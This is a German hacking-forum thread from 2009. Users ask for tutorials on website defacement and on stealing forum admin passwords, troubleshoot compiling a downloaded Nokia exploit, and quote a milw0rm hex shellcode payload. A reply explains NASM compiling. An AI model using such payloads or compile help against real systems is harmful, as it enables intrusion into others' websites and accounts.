Du suchst ein tut?...Ich mache es.

**~~ente~~** · 01.02.2009, 02:36

kannst du für mich ein Vtut machen, wie man NASM unter Linux installieren kann, und wie man ein assemblercode compilieren kann... danke..

**.hack** · 01.02.2009, 05:33

n tut über webseiten defacen (also wie man da vorgeht, wo man exploits findet und richtig anwendet, etc. du weißt schon was ich meine) wäre geil.. oder wie man phpbb3/beliebigem forum admin pw rausbekommt sowas halt..

**55F** · 01.02.2009, 05:40

Zitat von .hack

n tut über webseiten defacen (also wie man da vorgeht, wo man exploits findet und richtig anwendet, etc. du weißt schon was ich meine) wäre geil.. oder wie man phpbb3/beliebigem forum admin pw rausbekommt sowas halt..

ich würde mal die sticky's in der exploit section lesen

**.hack** · 01.02.2009, 05:48

schon getan, nur irgendwie funktioniert das nie..

letztens wollte ich diesen exploit kompilieren, leider hats nicht so ganz geklappt. ich habs unter mac os x versucht und zwar mit gcc..

ich poste gleich mal das was ich in die bash eingegeben hab, moment.

.hack:~ hack$ cd downloads
.hack:downloads hack$ gcc lol.cpp
lol.cpp: In function ‘int main(int, char**)’:
lol.cpp:28: error: ‘msgm’ was not declared in this scope
lol.cpp:34: error: ‘msgm’ was not declared in this scope
lol.cpp:41: error: ‘msgm’ was not declared in this scope
lol.cpp: At global scope:
lol.cpp:53: error: ISO C++ forbids declaration of ‘msgm’ with no type
.hack:downloads hack$ clear

hab zuerst zum verzeichnis gewechselt und dann kompiliert, wie mans daraus entnehmen kann..
dann hab ich die fehlermeldung bekommen.. ist das überhaupt ein c++-exploit oder ist das nur c?

kann niemand weiterhelfen?

**blackberry** · 15.02.2009, 20:35

Zitat von .hack

dann hab ich die fehlermeldung bekommen.. ist das überhaupt ein c++-exploit oder ist das nur c?

Das ist C... um genau zu sein ein etwas älterer Standard, in dem das implizierte Deklarieren von Funktionen noch erlaubt war und bei einer Deklaration ohne Typangabe automatisch int angenommen hat.

Also:
gcc -ansi -o nokia_exploit nokia_exploit.c

Oder, falls du es umbedingt als C++-Code kompilieren willst:
http://nopaste.free-hack.com/index.php?id=2410215c9d

mfG. BlackBerry

**~~ente~~** · 15.02.2009, 21:28

hi
ich habe zu viel code von miworm gelesen, aber ich kann nicht ver stehen...
zb:
my $shellcode =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x34".
"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\ x34\x92\xc9\xc6".
"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\ x14\x93\xa9\xca".
"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\ x33\x53\x88\x8e".
"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\ x10\x93\xa9\xe5".
"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\ xdf\x1b\x1e\xa7".
"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\ xbf\xd2\x4e\x08".
"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\ x34\x92\xc9\xeb".
"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\ x5c\x62\xc8\x87".
"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\ x57\xbc\x27\xfb".
"\x51\x92\x42\x83";
könntest du mir zeigen, was das ist, wie mann das machen... danke schön..

**blackberry** · 15.02.2009, 21:45

Zitat von ente

my $shellcode =

Ich würde sagen das sprängt den Ramen eines simplen Videotutorials, da du für solche "shellcodes" gute ASM Kenntnisse benötigst.

Google einfach mal "shellcode" und belese dich ein bisschen...
Falls du wissen willst, was dieser Code macht, kann ich dir NASM (bzw. NDISASM) wärmstens empfehlen (<--- Google).

PS: ich Wette das kommt aus der Windows-Shellcode-Abteilung von milw0rm (ich finde keine "int 0x80" in dem hexdump... würde mich über Feedback freuen).

mfG. BlackBerry

**noctem** · 15.02.2009, 22:34

Zitat von ente

kannst du für mich ein Vtut machen, wie man NASM unter Linux installieren kann, und wie man ein assemblercode compilieren kann... danke..

>Den Quelltext kompilieren:

Mit "nasm -f elf foo.asm" erstellt uns nasm eine binäre Objektdatei im "Executable and Linking Format" (-f elf).
Nun haben wir, wenn keine Fehler im Code enthalten sind, eine Datei names foo.o im Verzeichnis.
Ein ausführbares Programm bekommen wir mit "ld -s -o foo foo.o". Der Parameter -s steht für "Strip all Symbols", was unsere Datei kleiner macht, indem etwa Namen entfernt werden.
"-o foo" gibt die Outputdatei an, also unser fertiges Programm. Mit "foo.o" geben wir unsere Objektdatei an, welche wir zuvor erstellt haben.
Nun dürften wir eine fertige, ausführbare Binary haben, welche sich starten lässt.

**.hack** · 15.02.2009, 22:56

Zitat von BlackBerry

Das ist C... um genau zu sein ein etwas älterer Standard, in dem das implizierte Deklarieren von Funktionen noch erlaubt war und bei einer Deklaration ohne Typangabe automatisch int angenommen hat.

Also:
gcc -ansi -o nokia_exploit nokia_exploit.c

Oder, falls du es umbedingt als C++-Code kompilieren willst:
http://nopaste.free-hack.com/index.php?id=2410215c9d

mfG. BlackBerry

wenn ich es als c kompiliere kommt das raus:

i686-apple-darwin9-gcc-4.0.1: no input files

und wenn ich es als c++ datei kompiliere (von nopaste) kommt folgendes:

Undefined symbols:
"___gxx_personality_v0", referenced from:
___gxx_personality_v0$non_lazy_ptr in ccHI7yDx.o
ld: symbol(s) not found
collect2: ld returned 1 exit status

**blackberry** · 15.02.2009, 23:06

Zitat von .hack

wenn ich es als c kompiliere kommt das raus:

"no input files" bedeutet, dass die angegebene Datei nicht existiert!
Bist du sicher, dass die Datei "nokia_exploit.c" heißt und du im richtigen Ordner gearbeitet hast?

zu dem C++ Fehler:
der Sourcecode kompiliert bei mir einwandfrei und außerdem habe ich so einen Fehler noch nie gesehen.
Bist du dir sicher den Code korrekt übernommen zu haben?
Was für ein Kommando hast du in die Konsole eingegeben?

Thema: Du suchst ein tut?...Ich mache es.

Themen-Optionen

Anzeige

Stichworte

Berechtigungen